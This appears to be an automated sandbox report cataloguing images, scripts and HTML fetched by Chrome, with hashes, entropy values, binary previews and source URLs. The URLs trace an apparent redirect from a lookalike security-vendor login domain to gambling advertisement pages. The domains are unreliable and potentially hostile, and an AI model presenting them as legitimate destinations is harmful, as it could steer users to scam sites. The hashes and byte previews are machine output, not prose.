                                                                                                                                                          Preview:...........VKo.0..+.R46"(;.u........v..B...c{..60..G=...z.a.$.E....T..18+..]@v$k.)b_.I.h.[f .,..E<.........P..U.|...Q..._.j..8....p..5bi{..o..>.h..0'9D..e....u.G+..N.....\.l6..w<...'T;z..;u.....R/..:i......y....Lk^+.^{...>.8F...C2.~....^\D......^7Ud*pL.+..7!....d.&...G.x.:....wt...3...."...O....b..Yn,]I./)'.K.._{C.....P>..'.?...K...W.$yU.k`.p.%..N{'.Rl.D.....Y../.........h...KT..#..0....Q.lZ....B..;D.V....7E.K._.eM....U..5.....fK.n.asdvh.w.p.........!...h.........p.Y.z..R.c...>.T..X&X].p,);p...x.0^O...r...h(....E......W..X.aV=...........%.T..8...]|j...G`*...~%.+e..3,.s:..NL...h>W..i.....P..../.B...G^.>.yK...('i.$....d...7.YrH.D.f...D"s.e...\......a...be..0..p$....J..mxZ....f..[.d1.P...u7....?y....._.j.G..{q....cQ.ss...8.W./.ic$"..[..+.T.d......D....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1226
                                                                                                                                                          Entropy (8bit):6.675899414190611
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:n1hmYaWwjx82lY2T3XVa2U602HyJ3VE2UPR42gGR5GX2g+hmCL0b:1MYLNn2Dw2Ub2SJ3G2Uy2gpX2g+DC
                                                                                                                                                          MD5:6490E3415C31FEEA518921EEEAB5AB79
                                                                                                                                                          SHA1:B57D8581E52CBCCF7CEBAE8268391928259A24AC
                                                                                                                                                          SHA-256:FDEEE3BBDCFDB27988C80EE3F4F6579868D4961BE298C815F24097459CE26517
                                                                                                                                                          SHA-512:5885701A9428F42FD0FFE61D62E21AD5D809FCF7033E7289F83E30C2162604985468C3496929F566BB06B1D34794B98CC95C577699CB9436B7A182678DFD635A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:F65FC5B27B2311ECBC0A8CA539DEE263" xmpMM:DocumentID="xmp.did:F65FC5B37B2311ECBC0A8CA539DEE263"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F65FC5B07B2311ECBC0A8CA539DEE263" stRef:documentID="xmp.did:F65FC5B17B2311ECBC0A8CA539DEE263"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>T{.)...:IDATx.l..+DQ..qs#B..(.(;..l%oi".`.V...X..B..Sl4..@...j6..P..(..-.~.N.{..s.{.....,X....).....r........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972852372
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 27362
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7595
                                                                                                                                                          Entropy (8bit):7.9709594779932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JVbJ6VAc5D8necCl+aZ9rQdGooFTIGcOhfsHJ78D9FVhWafEFEVBv+VwgrAu+8AE:/bG5DIeZ9hoA6OsH5+9Fuh259GyQ
                                                                                                                                                          MD5:5717964EE82B5F8A21BEDAAA4F7183D6
                                                                                                                                                          SHA1:58472AEAB3D0BB95A4AD8DD0E2313D3A958DF4F2
                                                                                                                                                          SHA-256:87C20F9C07801867CEBD8D8DCB3C21724BD78A1E77BDD13B0293A271773F888A
                                                                                                                                                          SHA-512:031804E048BE3F7DFBD15AA8E95D262B20D94FC910D03B29582973B9F05AE0F0F643944B3C418E30DD4406D7598A9AC4E155AF1F014D7E6105358E35B985306B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/home/TopPage.js?v=1717580749344
                                                                                                                                                          Preview:...........=]s.Hr.E.).....].yIC.Y....-..='..T...X.....u.RWyK%y...%/..T.5...%......J.E.cf0...d..)[e........t.....(..S.<I.,O.ik...dh.V....q....d./.0M..U.M..{1..y...SY..UuUE....E%g...,....A.y..<...<..qx.H:..l...:.....'zA2..{'....+~ ..4....1b.......d..e.I}......0.a...y..K;.....,....5...(......Y{..;...(......=."k......t..)C..4M...v.Y...Y....).{.~.......'=7...........Y>.2..t.w..W..h.0..V........?x.t.......'.>..4.._W..^.r........0...%.!....E.?..a.+..<..C/./.::.}.....}..hJ...(oix.4.W...u.0?.&a2......x.-.J.v..U4......j.F.:.B.G.....v....8....EW.,..W..X...-.>........\....s..H....B...........:..l.\...L..p...@.-Is.....^2...<.M........0.2.A...'.3.-.].4..(L-..E.h...ey..>..a~.f.$....h[#.=..Yf9..................r...Y..\......^_[[...E...z..........~.....G).y2..9.hx...).f.`X...rP.....u....!........u.i.i.&?.R.YG....`/..+...p.[..Q.?v.wB..2wHUf[V..7-o.O..b..x,..m./...G.-.az.ZY8..9...PS;s..7.R."I'..!I....3...d...G......x:.O.`.........`,.*...}.+...f.E(..$>..p......1...#..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1185
                                                                                                                                                          Entropy (8bit):7.6719104188528515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:aaRkmCwn9Xh+C/sL6ixUpR4UmqSTQHNX3MI8hfPylUVVof7l:aaQG9XoOnpG3qEQ9YylOmx
                                                                                                                                                          MD5:146543E450FC14D73E0EED090A98B2A1
                                                                                                                                                          SHA1:0D3CFDC499D8FDBB095B11619E60ACDE0738E2F8
                                                                                                                                                          SHA-256:BACEDE543CDD78CD430E4D796C8B3BA7EBD7EAFB2D75D84996A08AC7DAC3A149
                                                                                                                                                          SHA-512:C5E728688DF1332153037B7F0D254FC780DEF31D8B9A2B26CEC8F4E953435FBD484DB73D5F336A6B3B035ECA8F4CE86CDC3B72F3742CA3FDA3653CE809BFEEC4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^....1PLTE....a.b..d..N.Y.[.|7..J..j.Z.T.W.d..o..l.`..h.U..L..G..E..K.Q..N..F.[.b..O..=..l..K.m9..G..@..4.V.Q.b..M..o..n..I..E..m..?..U..m..n..G..=..M.^.U.f.X..g.\..o..N..k.e..V..Q.a..j..J.Z..M..G..m.Z..i..N.].V..K..d.b.Z..B.`.^..L..p._..N.J..@..<..D.M..>..@..I.w:...a.].^.t8..K..8..t..p..@..T..A..G..;..[..e.k.G..<..g..*../..Q..$..h..W.@..9..s...l..A.r+..o..X..#..I./.`...I....?.c..n..l.g..f.]..m.a..V..j.\.W..Q..L..n.Y..I..S..N..E..I.Y..R..O..E..p..m..j.g.g..T..C..A..o..m..l..g.a.^.[.Z..W..V..S..R..N..J..J..H..0.....tRNS.&.P>7,..............KHH541/.*)(&&&%........................................................................rf^YUNNLIIGFEECB@@73/.&&%!..Y.......IDAT(..UW.Q....;."..........[.......c..#\p.s1...YC>......T...z_..d6U.....e.D.w.V,...Y.`._..L.9e..7.......\}.JI....>....#j.HW.....G1....*...D[.p.X.&.Qd{.....H..P..s..]...4..x.....Y..!<`R4...Ee.qa{.oMs.w.N....wq.....q...N...iX{.+...0/.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3709
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1605
                                                                                                                                                          Entropy (8bit):7.851692774237802
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:X6cMAz2z69hKV/g/utBf1e70wVnkCB9xLPNA:lzI69cVrRApVnkCpPNA
                                                                                                                                                          MD5:2CB7E39A806FF00165DA309D1611B0CD
                                                                                                                                                          SHA1:716DC75A1B27DF6E3B027D2DB22A7A547B36DD43
                                                                                                                                                          SHA-256:8E7FBF1BD2CD01679A539D50758E780D0CD561165FCB7A72CCEFC9DE6E75E2E9
                                                                                                                                                          SHA-512:F0CA82F0AEB455B98A747D6374BCD2D52CBEDF6DCCBB824671C586608E3E01A6D755CF708D8E729A0C019BDAD5ECCB69940F6160CADFDCD0451FA5694E9CD613
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=f21714.com&withAgentCode=1&withSettings=1&terminal=1&ts=17972888341737
                                                                                                                                                          Preview:..........|WKo.6...W.:.^..^..:F....^'ho..]1.H...V..(...%@.^z.@....._....^...X....y|...8b.....L.]..=,.D.4O..{hN.vow......`..........HgF..R&....n...z......^.....)...........4=B9......s....O..}....hz..0.'...}..ON....5.D...Q..../T.`G....\..<c..V_Y.Zf.N..).+o....u$......1.8ER.S.....(.GbA.4.D.a+...c$.k..........S."].P...K.0....Q...R].....!...>..S....K...,4v..Sq.Vg..`.....Q..Dj:...X ".!Hc.X.....b"&R...c......{...H7...\...Wd......)..izW...)SD...+5...H2..T....<.d..x."~.G9~.j*x.....E..^.\.Kf...Q..~.Tm.F2O..gR...Sxm.eb..H&Ut.&.g.Bi.=&.8%.......|;A.)n.Mf0x.O3F./]..D....I.H..P.L...R.)..B2.....Rg..W.1b.".X:.K.....@..&...S..=....Xp-.........'Y..y.a.vh.g.=%.......Y,.....]..C..@U..yF...C.H......X.T.v:a.2...R.x$6".tPJ;Q'....B./..f%..(.....u.W....&.....j.8C.......qyD...v..{.Y.J&.|....b...7..j;.7`jpjN.4,........u.5Sc.BJ.....d.........(...G..c}L.2.....*...u.j..DYt.HSp3.B..U.5.[...3.S..#.P......L.FhxuJSU.W..u<.u-..^I.5L].5.(.qi9.!.....L....RSj.ee{}..K...$..V...$
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (6188), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6195
                                                                                                                                                          Entropy (8bit):5.222968211959788
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:JeLIykrnjnVT7OuOX9qaenzOF/Fdk9qrpOp6ZUnbaYIcEYtLIbfkeRUeY9j8f6MW:JeLLkaN20/7oZLmfbzqYG+W
                                                                                                                                                          MD5:F18E378F99CA075509430D9F233A0DBF
                                                                                                                                                          SHA1:D02A64FE09EBCB15D2C7B9609F5A5A313DE2F978
                                                                                                                                                          SHA-256:1230B2FCB83B075D7A38988AD20F85EB23F3EA776D91FD82186E76B946EBC587
                                                                                                                                                          SHA-512:13C24439F75BB24CECB622AFEA9AF759FE43948058FD585A4458E1F4A929D4566F4B9BACE262301D57C487B10CD54BB38E6E424E6D2537A58B3CCF48D8225251
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.698jbwad.com/nlp/index.php?keyword=%E6%89%93%E9%B1%BC%E6%AD%A3%E8%A7%84%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%8F%90%E7%8E%B0-%E4%B8%AD%E5%9B%BD%E6%9C%89%E9%99%90%E5%88%86%E5%85%AC%E5%8F%B8&from=pc&originUrl=http%3A%2F%2Fwww.bitdefenderlogin.com%2Fhome.php&referer=&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&v=1530
                                                                                                                                                          Preview:...<style type="text/css">#head img {padding:1px;margin:1px;border-radius: 6px;box-shadow: 0 0 5px #cccccc;border:1px solid #ccc;}</style><div id="head" style="width:1000px;margin:0 auto;"><a href="" rel="nofollow" target="_blank"><img src="https://www.image110.com/uploads/c0c87060c0d0344dc06ac6961604f1dd.jpg" border="0" width="100%"></a><a href="https://x551005.com" rel="nofollow" target="_blank"><img src="https://www.image110.com/uploads/e64e3b88ee0477d975ecd1b4e3ba5d63.gif" border="0" width="100%"></a><a href="https://hg679.cc" rel="nofollow" target="_blank"><img src="https://www.image110.com/uploads/hg1000-100.gif" border="0" width="100%"></a><a href="https://e933002.com" rel="nofollow" target="_blank"><img src="https://www.image110.com/uploads/e3d05ef563eb19591102e658dd7cdf90.gif" border="0" width="100%"></a><a href="https://xpj723.cc" rel="nofollow" target="_blank"><img src="https://www.image110.com/uploads/f99c3fc30e9a9c1b3a5474816d8e5a69.gif" border="0" width="100%"></a><
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 145 x 160, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):49776
                                                                                                                                                          Entropy (8bit):7.98758391630319
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:mDLX6JKlazjSAr2i5DDA96CndN/Jf7a9isEB:mf6J+a3rLDDi6Cdttu9iVB
                                                                                                                                                          MD5:7D1D29A787609D37544963A83D98C8B3
                                                                                                                                                          SHA1:0F24F555823D925ABF03B6A86B3363E05D3C6B6B
                                                                                                                                                          SHA-256:1D3C62F08382597613D184A536A656D5D42ABE900A0B850DE551D890D3F58289
                                                                                                                                                          SHA-512:1FB7BB4749BF3E9C86C692EE8A634533178B87EE56E174B78A1CE7750564C439BE210C4C72A745556A7B0D272672595C2186CD0A71C50282D7E5B4B51EEA9FD2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/fixed/01.png
                                                                                                                                                          Preview:.PNG........IHDR................+....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx^...t....w.....@.%.w...f..............AC....H .n..0..}W'L`83......__..WuWUWK]..}.......O.#}q.Nl..?J.....FP+.=.y.>.....W.W...C...P...Te...{..^_..#.....*..{...M...P...... l.N.dj.....]E{>..O..|:Uw..">/..e...#.,...A.R._|.......O.......}q../.......$-J.f8..*........\..A..2hU.O.f....hD.-..hT...c.q.4.Z..B..,hU...%.YMm..lE.@..u.:B...)./...P_Z..$...X_Z..G~...R_.`..+6.R'f.(...K./N +...8.6;..7B;........(...U..T7."..U..ZQ./..B..Q.Q..4*...B.r.hT...*..3..K...u.B;vC.P|}E.T..R.)q(./~..S_Z..$..../-.#...../|.".Sm.1.C.|.=....:.tb.....n..y..M..b..iUXB`.A.4W|i.......vPE..U.>.G0..........PU..U.~PU..U...e...NPF@#v.ZU.s(..."B.....8BUu,5.Z..........U.....w....Q>_.l_+~?..KT*..K.|.e......T.....o.K.,+s.t.O..?R.1...7.Sz.o..&..0.D~..Zo...$(Cy.Qf.T..%....@.8,.........RTe.2....98r*...N...6......W5^..h}.2M+6....U.I..Fu..].Ka.4hU.G-.#-',k.y......7...Be.A.C....QA.W~x1. .....gYnn.Ke.E.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/cc.png?r=4712066170
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2909
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):911
                                                                                                                                                          Entropy (8bit):7.814395167373869
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Xff+yozp6y5X85idtYXrsLVh4YyrickQNuQjI0vf4W2:X3+7zQSXgyB4YyjkQNnjtvf4W2
                                                                                                                                                          MD5:287B6B8F1EF0D064F10FB8C6063DE18E
                                                                                                                                                          SHA1:C0671E7287F3390346C2250474CCDC0A11015DB5
                                                                                                                                                          SHA-256:7C6A09F79F2F68528F3ADAC1C437567AE93B76983A0BE73CFDBD2C5BD45A0731
                                                                                                                                                          SHA-512:77BE681AA9207D2E28E4A664E755D0F63577F635F73405E72926C860A0CCE6D862CE9CFC7AE58CDD854ED29C46B9CCADAD28FE9AB5FE577151E9660BDD51318C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/themes/hb/css/pc.css
                                                                                                                                                          Preview:...........U..8.~..).6.+.@...t..j..V..8.Z.F.l.F..w0.q6.?^..*f..f.... .B.&hu.\...<(w..b...7/...bR.....E.%......jWH>.j..6F+..T$kR.L....L#.26..N.....%'...\f...1Qn...>,.<.f.h......Q...HHA..d.E%7".QU.d...Q..*..qSt.\.Y.HM..v|...M.......^./.z.M'.....t3v<....g....I.$.T..2K....AU....I.x....2..........%%...,.mV.Q..g}:.........2]..t.G.Y.7.=o.9.........B.j......M..7.o.....W.bt)1.....8......EW6}....I......D3.,..2;..x..o..(A.2.Z(...^....Ty...`E.........(..A.5=.G..`eo.V#..96..$..I.E.5y#..K........r..=].ho/.79..X1...is>.'/)Q....vRl.lN.........O.~........$......v....V..>.....CC...r..d.....!........%.....[...-.....7.(y......o.'....tp.<....g.......~~.8.v..o. ]...!}$|..l...^&.%Q.dN.W........._..6....{..s.....+K..:%|.q.?.4SW.X....2..(..||....[]*...T....\.3.6.0J..!../.<...9.......c.G..Ed..`.{w.ig..q8Ac.....dL.o....s..y...|w9.jY....`.RV...<o........{B...n..]...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33833
                                                                                                                                                          Entropy (8bit):7.989977694517762
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:mA0k5P9lbfIBdJaSzZ+4w27OaIk03bf2ARLt8NY1jFqp:/TRIBdFZ+4w2SaIk0rRRh8uCp
                                                                                                                                                          MD5:825032D5B0752E042AF6BD51B0C67D22
                                                                                                                                                          SHA1:AEF2865442CF64F4BE4A7495EAC941C02DBD37D1
                                                                                                                                                          SHA-256:F63373242AB3B3354B30C8DC0DFBAD2FD05671734727C7E53FC81FADA4E8A47F
                                                                                                                                                          SHA-512:E9DE9860C314464AA5E077F60E952050557B1E494A0CC085C495A65029453A0215DA9CA6961456197C87F8EADF864214E9A01B1EB3F609B6F533D5E45E30BBEF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:6A14FA8893A511EC9B20F2CBA5BE0449" xmpMM:DocumentID="xmp.did:6A14FA8993A511EC9B20F2CBA5BE0449"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6A14FA8693A511EC9B20F2CBA5BE0449" stRef:documentID="xmp.did:6A14FA8793A511EC9B20F2CBA5BE0449"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.;.....IDATx..}.x...;u{...b.,..L...7S...B.$$8...!....%4....B....^%7Y.l..+...)..].,..`s.{.y...M.s..}.W....q..K.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):50865
                                                                                                                                                          Entropy (8bit):7.930801758627568
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ORtAtdiO4ltTuakXOjEj2T0JJX5FFWS3lGfCd:0tAt4lEauOOY0JJX5rUfa
                                                                                                                                                          MD5:B2DF6D68943331F26EC0DD6DDC0620DF
                                                                                                                                                          SHA1:2C5FCB2820E2DA680E5004254CDEE88A44590A51
                                                                                                                                                          SHA-256:DA1234C68281CFADB0B1B7BFB688A35689F01343B90EE92C1F52BF93FB571CA3
                                                                                                                                                          SHA-512:6948489C7DF5844A11FE9F32610B2571E420108B8D3D0D0EE398EBF0648D8BC76092685825318940036101BC293086F9E6394E9DAC73A5594B6589D1B4646997
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d.......&.....H,..S.......TS...c....w/........2....h..h.........o;........U5 ...Z....I.g.H.X.w.s.....F..x..H.yJ..s.....z....z........O...XS6...E...xB.Y1...64$..k..6.....:..f.....:....f..X..U..G..vxuW..hdH...........y..VT4&$....UU..h..:5...g.......g..s..B....h...$#.....ee...tH(..v..wWVEiC%GD!ee...i....b.J..<..XUF#...ib&.............FE4xtF..F..ycY&..Q..W...B..vYR"jiT..Xrh(.Y`[5..hd7..XwiE=<..W|t'....g..hwi6}w6..W...<..g....F..zzz`.f......RK5....h[D`:"smR.t..F..V..^........e..qtY7....U..t..0..`..T..y.....=id..H`[....|`..l.........jqW*..`.....bM0..q......u......g............N...`;./+._`J|M,.......e...........$..$$..........U.....<...........<<.......y.....yy......yy......qj......|........................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):296227
                                                                                                                                                          Entropy (8bit):7.982756410644414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:uw1hXRTabB+EVektektRPNViK7A/EiK7A/EiG:uudEbEEHPN7As7AQ
                                                                                                                                                          MD5:CE47548F8197B3AF694DB0C395D2FC81
                                                                                                                                                          SHA1:060F16029ABB13A10DC22D5C47E23F4C0BF48D9D
                                                                                                                                                          SHA-256:15960912C704E3AAABC90EC68F553E959B74C753120EBDF28C038CC43FC81D0D
                                                                                                                                                          SHA-512:D69204E7078E42D2AD86EB4CBB4892F0B74F50B08361CAE2473D75F317C15ACC1DD6467021EE86B81A28E30422CE4763F601F9E6A27819882D5D928EAE35713E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/f99c3fc30e9a9c1b3a5474816d8e5a69.gif
                                                                                                                                                          Preview:GIF89a..d......Y....k...dX...m-........-.-.....Z..(.R'..z....U).....h.....:...., .&m.)..e...I.(..S..U.k......l....)....#....r.......2....,0.qB. "....e...A....M........p...s.(+....03.... "..4....Eg...xy.... ..|...K.. .03..k....roa...l...sl...I.(+..R..A....0...*[.,.f....d.....d.m.E.8 ..c.......N .C.O.F.......x...n.T.....U..'........B.....[..).....t..<.....D..W.O....6..Z..........SF....C....$&.&)....E:......0.......k.C.. .K....p......g.=.....[..{.,/.......O.Hu$... ...o....m..s..........j. ...F.........z;..c.*...c........-..b.....R.< .:2I=.z..*...e..]...0..<&...9....o..71#......l1*...i....$&..7..k..\...... ..i.....Z..w..m.A=.*...P.....:.A4..J@F...%..p..e..3..{..|.*-.-...3....48OF.....*-....69....48.$(.....Q..q..MY...4..M.0......."...............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3871
                                                                                                                                                          Entropy (8bit):7.942910088325684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:6SStwprXt/cAYeCS40r2yfnvPQRG6CFxLoZuQRnxt3C6BKsor:6SStst/cAYl62QXQPZDH3C6Bsr
                                                                                                                                                          MD5:D3F65BE5FF7775151A36E4945FD2CD01
                                                                                                                                                          SHA1:D0E6267B5F14ECC73AFC3E5AE5CE97684A4B0380
                                                                                                                                                          SHA-256:18CAAEEC7041497578C2E566B3BBA4922D7882B4080FA1AF28CE02A844E25258
